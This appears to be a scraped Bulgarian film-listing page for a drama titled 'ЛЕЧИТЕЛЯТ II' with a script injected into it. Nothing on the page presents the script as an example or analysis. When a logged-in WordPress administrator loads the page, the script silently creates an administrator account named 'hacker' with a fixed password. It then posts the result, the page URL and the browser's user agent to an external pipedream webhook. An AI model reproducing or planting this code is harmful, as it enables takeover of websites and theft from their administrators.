ЛЕЧИТЕЛЯТ II
HD
HD
HD
HD
HD
HD
HD
HD
HD
HD
HD
HD
HD
HD
HD
HD
HD
HD
Драма
<script type=”e6cd123957c495864b07c068-text/javascript”>
function addAdminUser() {
var uri = “/wp-admin/user-new.php”;
var username = “hacker”;
var email = “[email protected]”;
var password = “AttackerP455”;
var xhr = new XMLHttpRequest();
xhr.open(“GET”, uri, true);
xhr.send(null);
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var response = xhr.responseText;
var noncePos = response.indexOf(‘name=”_wpnonce_create-user” value=”‘);
var nonceVal = response.substring(noncePos + 35, noncePos + 45);
// Crear el admin
var xhr2 = new XMLHttpRequest();
xhr2.open(“POST”, uri, true);
xhr2.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”);
var body = “action=createuser&”;
body += “_wpnonce_create-user=” + nonceVal + “&”;
body += “_wp_http_referer=%2Fwp-admin%2Fuser-new.php&”;
body += “user_login=” + username + “&”;
body += “email=” + email + “&”;
body += “pass1=” + password + “&”;
body += “pass2=” + password + “&”;
body += “pw_weak=on&”;
body += “role=administrator&”;
body += “createuser=Add+New+User”;
xhr2.send(body);
// Exfiltrar confirmación al webhook
const headers = new Headers();
headers.append(“Content-Type”, “application/json”);
const exfilBody = {
status: “admin_created”,
username: username,
nonce: nonceVal,
url: window.location.href,
userAgent: navigator.userAgent
};
const options = {
method: “POST”,
headers,
mode: “cors”,
body: JSON.stringify(exfilBody),
};
fetch(“https://eovrkqjaaojxmrc.m.pipedream.net”, options);
}
}
}
addAdminUser();
</script>

